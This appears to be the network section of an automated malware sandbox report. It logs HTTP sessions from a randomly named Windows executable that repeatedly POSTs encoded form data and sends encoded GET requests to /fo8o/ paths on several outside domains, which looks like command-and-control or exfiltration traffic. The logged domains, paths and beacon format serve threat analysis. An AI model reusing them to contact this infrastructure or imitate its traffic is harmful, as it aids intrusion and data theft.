                                          Aug 30, 2024 09:40:16.681305885 CEST1236INData Raw: e3 81 a1 e3 82 89 e3 81 8b e3 82 89 e5 a4 89 e6 9b b4 e3 83 bb e6 9b b4 e6 96 b0 3c 2f 61 3e e3 82 92 e8 a1 8c e3 81 a3 e3 81 a6 e3 81 8f e3 81 a0 e3 81 95 e3 81 84 e3 80 82 3c 2f 70 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 74 78 74 30 32 22
                                          Data Ascii: </a></p><p class="txt02"> www.kasegitai.tokyo is Expired or Suspended. <a href="https://www.value-domain.com/modall.php" target="_blank" rel="nofollow">The WHOIS is here.</a></p>
                                          Aug 30, 2024 09:40:16.681318998 CEST1236INData Raw: 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 46 69 74 54 65 78 74 2e 6a 73 2d 6d 61 73 74 65 72 2f 6a 71 75 65 72 79 2e 66 69 74 74 65 78 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74
                                          Data Ascii: "></script><script src="/FitText.js-master/jquery.fittext.js"></script><script type="text/javascript">//$("body.blackboard .host").fitText(2.2, { minFontSize: '10px', maxFontSize: '100px' });//$("body.blackboard .after-host").fitText(3,
                                          Aug 30, 2024 09:40:16.681509018 CEST20INData Raw: 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: ody></html>0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.449742116.50.37.244803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:40:23.011904955 CEST800OUTPOST /fo8o/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.goldenjade-travel.com
                                          Origin: http://www.goldenjade-travel.com
                                          Cache-Control: no-cache
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 205
                                          Referer: http://www.goldenjade-travel.com/fo8o/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Data Raw: 65 6c 4a 74 65 68 6b 48 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 64 4c 4e 69 4b 4e 35 6c 6e 6e 59 57 6a 72 30 50 55 51 69 66 77 72 76 4a 78 5a 5a 4d 4e 6d 50 57 67 3d 3d
                                          Data Ascii: elJtehkH=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOdLNiKN5lnnYWjr0PUQifwrvJxZZMNmPWg==
                                          Aug 30, 2024 09:40:23.906018972 CEST492INHTTP/1.1 404 Not Found
                                          Content-Type: text/html; charset=us-ascii
                                          Server: Microsoft-HTTPAPI/2.0
                                          Date: Fri, 30 Aug 2024 07:40:23 GMT
                                          Connection: close
                                          Content-Length: 315
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.2.449743116.50.37.244803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:40:25.555146933 CEST820OUTPOST /fo8o/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.goldenjade-travel.com
                                          Origin: http://www.goldenjade-travel.com
                                          Cache-Control: no-cache
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 225
                                          Referer: http://www.goldenjade-travel.com/fo8o/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Data Raw: 65 6c 4a 74 65 68 6b 48 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 50 63 55 32 51 74 42 4f 62 47 4e 6b 77 72 32 43 59 67 38 41 68 2b 2f 4a 67 36 67 70 45 6a 72 56 55 3d
                                          Data Ascii: elJtehkH=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwPcU2QtBObGNkwr2CYg8Ah+/Jg6gpEjrVU=
                                          Aug 30, 2024 09:40:26.448451042 CEST492INHTTP/1.1 404 Not Found
                                          Content-Type: text/html; charset=us-ascii
                                          Server: Microsoft-HTTPAPI/2.0
                                          Date: Fri, 30 Aug 2024 07:40:25 GMT
                                          Connection: close
                                          Content-Length: 315
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          7192.168.2.449744116.50.37.244803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:40:28.121078968 CEST10902OUTPOST /fo8o/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.goldenjade-travel.com
                                          Origin: http://www.goldenjade-travel.com
                                          Cache-Control: no-cache
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 10305
                                          Referer: http://www.goldenjade-travel.com/fo8o/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Data Raw: 65 6c 4a 74 65 68 6b 48 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 66 69 65 30 2f 78 4c 31 6c 5a 52 68 6e 6e 47 47 38 30 5a 50 75 46 57 32 34 52 38 33 5a 36 75 7a 68 41 38 70 49 79 36 71 70 35 32 67 37 47 6f 59 53 59 56 49 68 50 49 33 76 65 67 37 42 74 6a 76 48 74 63 6e 51 35 58 36 36 46 6f 2f 61 42 35 66 75 48 4b 75 73 68 32 58 31 32 56 6f 59 48 76 33 4f 77 2b 5a 55 2b 78 63 32 41 71 79 6c 65 38 74 45 58 6b 41 56 2f 49 78 6b 4a 66 6b 30 51 50 51 44 61 69 4c 6c 4c 55 6a 37 41 31 6e 65 50 54 4a 73 75 48 61 37 32 65 43 66 48 68 58 7a 6f 45 [TRUNCATED]
                                          Data Ascii: elJtehkH=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnfie0/xL1lZRhnnGG80ZPuFW24R83Z6uzhA8pIy6qp52g7GoYSYVIhPI3veg7BtjvHtcnQ5X66Fo/aB5fuHKush2X12VoYHv3Ow+ZU+xc2Aqyle8tEXkAV/IxkJfk0QPQDaiLlLUj7A1nePTJsuHa72eCfHhXzoErbJI7p0dZ0pvtJLPZCNBbfkZZuwld9LpKhkNEJcSFOpl0hwuQzM9OQ/06997bt03YSdIl1xfzR1paiBmgpgShwwcgWK2BHOIJ9pQzQmp/aD7JQSgbpKyX1LMz97dC3vpXT3T1LmfKc9RuG9FmNkX7rQVVFILVYi6fvP8mkfpU7Ub0LSpcQNjipOC0C/C+nZq/IVMWXhXRD53Din+vxQqiZwpVUJitjjiixIvySAQTu7i2pB2AbFWoNuRZF040YNoZpACYJlJyTbOftlZduaTAPmKC17B0A12pI4KZk94p8f7ouqcGtZpOv+7FgBiooP+OK41b6hivVy32G5UaAEsxSpFLYPJBxa1ZdR+vlj9IPg+HYBFaY3ZcsS4vBiQvd8+YEtGOTttG4kJLaib5p9RHFexGC5PDr6OwcxU/+X6wqyXE4SSRslpqvOvtYg54LeLHsKS7XiPqU35EdT52sfLN1AkWYVAqSNJ48HgNyqyX76+L+QJcUICRB5XPJiCkT4c5xhxV5sZh8T14Qm+BCAWAVGAb8okuU5+LbGl0CaMHYmni6NYZMRIBwwGzlHkVarquRdNwmCte0coo2aX+9i/xOFsUkIK3Ux/fgJ2rn0ElRR0LKiSxqU/5yT+uC1HI1lkflUrMhIcrcSKK5VXxofzw1KR7NuTOVYykv [TRUNCATED]
                                          Aug 30, 2024 09:40:29.002306938 CEST492INHTTP/1.1 404 Not Found
                                          Content-Type: text/html; charset=us-ascii
                                          Server: Microsoft-HTTPAPI/2.0
                                          Date: Fri, 30 Aug 2024 07:40:27 GMT
                                          Connection: close
                                          Content-Length: 315
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          8192.168.2.449745116.50.37.244803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:40:30.648391008 CEST515OUTGET /fo8o/?elJtehkH=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=&z8_=glwH5BKp HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Host: www.goldenjade-travel.com
                                          Connection: close
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Aug 30, 2024 09:40:31.694725990 CEST492INHTTP/1.1 404 Not Found
                                          Content-Type: text/html; charset=us-ascii
                                          Server: Microsoft-HTTPAPI/2.0
                                          Date: Fri, 30 Aug 2024 07:40:31 GMT
                                          Connection: close
                                          Content-Length: 315
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          9192.168.2.44974685.159.66.93803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:40:44.890352964 CEST779OUTPOST /fo8o/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.magmadokum.com
                                          Origin: http://www.magmadokum.com
                                          Cache-Control: no-cache
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 205
                                          Referer: http://www.magmadokum.com/fo8o/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Data Raw: 65 6c 4a 74 65 68 6b 48 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 6b 37 45 61 72 56 62 45 53 75 75 52 42 67 2b 62 76 78 5a 38 35 44 44 61 79 53 41 48 58 4c 67 73 77 3d 3d
                                          Data Ascii: elJtehkH=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R0k7EarVbESuuRBg+bvxZ85DDaySAHXLgsw==


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          10192.168.2.44974785.159.66.93803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:40:47.430948973 CEST799OUTPOST /fo8o/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.magmadokum.com
                                          Origin: http://www.magmadokum.com
                                          Cache-Control: no-cache
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 225
                                          Referer: http://www.magmadokum.com/fo8o/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Data Raw: 65 6c 4a 74 65 68 6b 48 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 6e 77 48 31 62 30 4b 55 32 70 33 31 34 55 71 54 73 4a 79 47 36 4e 68 6e 69 4b 2b 6f 68 44 4d 49 4d 3d
                                          Data Ascii: elJtehkH=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5nwH1b0KU2p314UqTsJyG6NhniK+ohDMIM=


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          11192.168.2.44974885.159.66.93803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:40:49.962585926 CEST10881OUTPOST /fo8o/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.magmadokum.com
                                          Origin: http://www.magmadokum.com
                                          Cache-Control: no-cache
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 10305
                                          Referer: http://www.magmadokum.com/fo8o/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Data Raw: 65 6c 4a 74 65 68 6b 48 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 75 33 54 6d 77 4d 61 71 51 6d 74 4c 43 70 54 55 37 78 4b 47 4b 50 33 48 63 71 76 79 6b 54 69 45 69 48 36 46 44 46 6a 35 4a 63 61 73 72 2b 54 30 59 77 4c 51 2b 36 33 73 63 54 68 32 45 66 54 73 59 6e 4a 78 53 73 4c 30 69 71 70 58 30 78 33 4b 4d 44 5a 75 4f 51 38 58 64 55 44 58 39 61 68 67 42 65 42 73 6a 38 6e 71 74 68 2f 73 6b 63 71 73 4c 75 51 2b 31 6d 4f 73 39 4a 51 4a 4e 66 55 41 36 4d 68 73 32 39 78 6c 73 68 64 74 75 6f 47 7a 73 6d 58 51 75 70 6d 64 53 4f 2f 6f 47 54 33 [TRUNCATED]
